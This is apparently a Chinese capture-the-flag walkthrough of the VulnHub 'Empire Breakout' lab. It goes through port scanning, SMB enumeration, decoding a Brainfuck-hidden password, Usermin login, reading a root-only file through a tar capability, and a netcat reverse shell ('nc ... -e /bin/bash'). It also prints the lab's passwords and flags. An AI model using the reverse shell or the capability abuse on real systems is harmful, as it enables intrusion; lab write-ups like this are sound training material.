目录
7. 攻击路径总结
靶场下载地址:https://www.vulnhub.com/entry/empire-breakout,751/
1. 侦查 Reconnaissance
1.1 IP地址
部署好环境,直接看到IP地址:192.168.20.135
1.2 端口和服务
全端口扫描TCP协议,获得80、139、445、10000、20000端口
sudo nmap 192.168.20.135 -n -Pn -p- --reason
3. 初始访问 Initial Access
3.1 普通用户帐号
对139和445端口的smb服务进行信息收集
num4linux -a 192.168.20.135
有用的信息只有一个用户名:cyber
3.2 普通用户密码
访问80端口,查看源代码,得到一个字符串
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
放到网上一搜,是一种叫Brainfuck Language的编程语言
随便找个提供执行环境的网站,执行这串代码,输出了一个长得像密码的字符串:.2uqPEfj3D<P'a-3
3.3 web权限
帐号和密码都有了,现在就找登录框,进行密码喷洒攻击
10000端口是Webmin登录页,20000端口是Usermin登录页,最后就Usermin登录成功了
3.4 server权限
Usermin后台有服务器的命令执行环境,真是踏破铁鞋无觅处
查看当前目录下的文件,有个user.txt,里面是flag:3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
6. 权限提升 Privilege Escalation
6.1 特权用户密码
按照套路该提权了,查看当前目录下的文件,有个tar程序,有cap_dac_read_search权限,任何用户都能用该程序打包自己没有read权限的文件,这有什么用呢?
如果特权用户使用tar程序解包,解包后的文件属主将保持不变,原来是zabbix解包后还是zabbix
如果普通用户使用tar程序解包,解包后的文件属主将和普通用户一样,原来是root解包后就成了普通用户了,原来没权限看的文件现在就有权限看了
正常思路是查看/etc/shadow文件,然后爆破密钥获得root密码,但这里实在爆破不出来,过程就不截图了
其他思路是查看敏感文件,比如管理员的密码本。翻找服务器,发现一个/var/backups/.old_pass.bak文件,当前cyber用户没有read权限
先去一个有write权限的目录执行打包解包,比如/tmp/或/home/cyber/都行
相关命令是(下图黄色部分)
3、查看:cat /tmp/var/backups/.old_pass.bak
相关权限是(下图红色部分)
3、解包后的文件:cyber/cyber
成功拿到了密码:Ts&4&YurgtRX(=~h
6.2 root权限(方式1)
但是Usermin限制了su命令的使用,无法切换到root,服务器也没开放22端口
先将shell权限反弹出来,摆脱Usermin的限制,再su切换用户试试
nc -nv 192.168.20.132 1234 -e /bin/bash
成功su切换到root用户
6.3 root权限(方式2)
当然也能在Usermin中退出cyber帐号,再以root帐号登录,就能获得root权限了
在/root/目录下的rOOt.txt文件获得flag:3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}
7. 攻击路径总结
公众号后台回复“20241025”获取该思维导图的.xmind格式源文件
原文始发于微信公众号(OneMoreThink):攻防靶场(21):EMPIRE BREAKOUT
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论